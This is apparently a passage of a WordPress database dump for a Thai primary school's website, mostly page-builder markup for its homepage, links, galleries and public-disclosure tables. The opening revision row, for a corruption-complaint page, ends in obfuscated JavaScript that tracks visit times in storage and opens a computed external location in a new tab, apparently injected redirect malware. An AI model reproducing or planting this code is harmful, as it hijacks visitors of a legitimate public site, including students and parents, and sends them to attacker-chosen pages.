Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ','','inherit','closed','closed','','474-revision-v1','','','2024-08-02 11:29:25','2024-08-02 04:29:25','',474,'http://pakhaeng.ssk.in.th/?p=481',0,'revision','',0),
(482,1,'2024-08-02 11:31:11','2024-08-02 04:31:11','<!-- wp:kadence/rowlayout {\"uniqueID\":\"14_b8ea4f-02\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"14_235c2e-aa\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column14_235c2e-aa\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"67990d4f\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e53f332c\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingBottom\":\"10px\"}} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"f2a87680\",\"mediaId\":23,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-f2a87680\"><img class=\"gb-image gb-image-f2a87680\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/โรงเรียนบ้านโคกสะอาด.png\" alt=\"โรงเรียนบ้านหนองปลาเข็ง-กอไหล่\" title=\"โรงเรียนบ้านหนองปลาเข็ง-กอไหล่\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"ff644ddb\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"14_f7576b-fd\",\"columns\":[4,4,4,3,2,2],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":30,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/ผอ-1.png\" alt=\"\" title=\"ผอ 1\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"14_bc537f-5a\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns14_bc537f-5a\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"14_1da0eb-4e\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\",\"link\":\"http://pakhaeng.ssk.in.th/?page_id=469\",\"sizePreset\":\"small\",\"background\":\"#0a71ad\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#0a71ad\",\"backgroundColorHover\":\"#8ed1fc\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"14_add57c-9d\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items14_add57c-9d kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"14_745a05-5a\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_745a05-5a\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลพื้นฐาน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_1e894c-db\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_1e894c-db\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ประวัติโรงเรียน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_3cdb23-c1\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_3cdb23-c1\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_92a3d1-5f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_92a3d1-5f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">กรรมการสถานศึกษา</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_225b86-42\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_225b86-42\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=469\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_e92ee9-59\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_e92ee9-59\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลบุคลากร</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_91c788-64\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_91c788-64\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลนักเรียน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_5a5d38-a9\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_5a5d38-a9\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูล O-NET</span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e5e0c341\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:contentviews/grid1 {\"blockId\":\"9l7bo6vn\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"showTaxonomy\":false,\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"showPagination\":true,\"postsPerPage\":\"2\",\"headingText\":\"วิดีโอกิจกรรมโรงเรียน\",\"headingStyle\":\"heading5\",\"headingHide\":false,\"category-terms\":[{\"label\":\"วิดีโอกิจกรรมโรงเรียน\",\"value\":\"%e0%b8%a7%e0%b8%b4%e0%b8%94%e0%b8%b5%e0%b9%82%e0%b8%ad%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99\"}]} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"0i8f2on2\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"author\":[],\"offset\":\"0\",\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showThumbnail\":false,\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"}],\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":35},\"thumbnailHeight\":{\"md\":170},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"meta-fieldsMargin\":{\"md\":{\"top\":\"-10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"meta-fieldsPadding\":{\"md\":{\"top\":\"-10\",\"bottom\":\"-10\"}},\"headingColor\":\"#ffffff\",\"headingHoverColor\":\"#ffffff\",\"headingBgColor\":\"#2d27a1\",\"headingHoverBgColor\":\"#abb8c3\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":20},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleHoverColor\":\"#0693e3\",\"titleBgColor\":\"#ffffff\",\"titleHoverBgColor\":\"#8ed1fc\",\"titleWeight\":\"500\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"titlePadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"titleBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"readmoreBgColor\":\"#6096b4\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>โครงสร้าง</strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?post_type=popupbuilder&amp;p=328\">ข้อมูลผู้บริหาร</a></strong></td></tr><tr><td><strong>อำนาจหน้าที่</strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=362\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=362\">ข้อมูลการติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=355\" data-type=\"page\" data-id=\"355\">ข่าวประชาสัมพันธ์</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=337\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=337\">Q&amp;A</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและการใช้จ่ายงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</strong></td></tr><tr><td><strong>แผนและความก้าวหน้าในการดำเนินงานและการใช้งบประมาณประจำปี</strong></td></tr><tr><td><strong>รายงานผลการดำเนินงานประจำปี</strong></td></tr><tr><td><strong>คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</strong></td></tr><tr><td><strong>คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</strong></td></tr><tr><td><strong>ข้อมูลเชิงสถิติการให้บริการ</strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=459\">E-Service</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>รายการการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</strong></td></tr><tr><td><strong>ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการบริหารและพัฒนาทรัพยากรบุคคล</strong></td></tr><tr><td><strong>รายงานผลการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</strong></td></tr><tr><td><strong>ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</strong></td></tr><tr><td><strong>การขับเคลื่อนจริยธรรม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 